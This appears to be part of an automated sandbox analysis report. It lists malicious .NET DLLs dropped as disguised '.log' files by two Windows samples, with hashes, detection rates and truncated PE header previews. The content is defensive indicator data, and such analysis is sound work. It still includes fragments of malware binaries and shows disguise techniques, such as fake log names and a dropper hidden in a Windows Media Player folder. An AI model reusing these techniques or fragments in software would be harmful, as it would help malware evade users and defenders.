                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\FQiXIcGc.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):40448
                                                                                        Entropy (8bit):5.7028690200758465
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\FizIvULx.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):69632
                                                                                        Entropy (8bit):5.932541123129161
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                        C:\Users\user\Desktop\HDgqkcCm.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33792
                                                                                        Entropy (8bit):5.541771649974822
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\HTUGeMKX.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64000
                                                                                        Entropy (8bit):5.857602289000348
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\IrkyWqxk.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34816
                                                                                        Entropy (8bit):5.636032516496583
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\KVHoAvPS.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.629584586954759
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\LBbeHZkL.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.660491370279985
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\LCxGrujI.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):342528
                                                                                        Entropy (8bit):6.170134230759619
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\MgnHXjFm.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38400
                                                                                        Entropy (8bit):5.699005826018714
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\NPXweASH.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34304
                                                                                        Entropy (8bit):5.618776214605176
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\OlTNIjCM.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):126976
                                                                                        Entropy (8bit):6.057993947082715
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                        C:\Users\user\Desktop\QImfPxDF.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):89600
                                                                                        Entropy (8bit):5.905167202474779
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                        C:\Users\user\Desktop\QNGyvuni.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):126976
                                                                                        Entropy (8bit):6.057993947082715
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                        C:\Users\user\Desktop\QWdyfgGf.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):40448
                                                                                        Entropy (8bit):5.7028690200758465
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\QXRfkjyW.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):36352
                                                                                        Entropy (8bit):5.668291349855899
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\QujYzohZ.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.660491370279985
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\RGOnlxSA.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38912
                                                                                        Entropy (8bit):5.679286635687991
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\RmrNprNr.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):24576
                                                                                        Entropy (8bit):5.535426842040921
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\SDpvGwhv.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):5.645950918301459
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
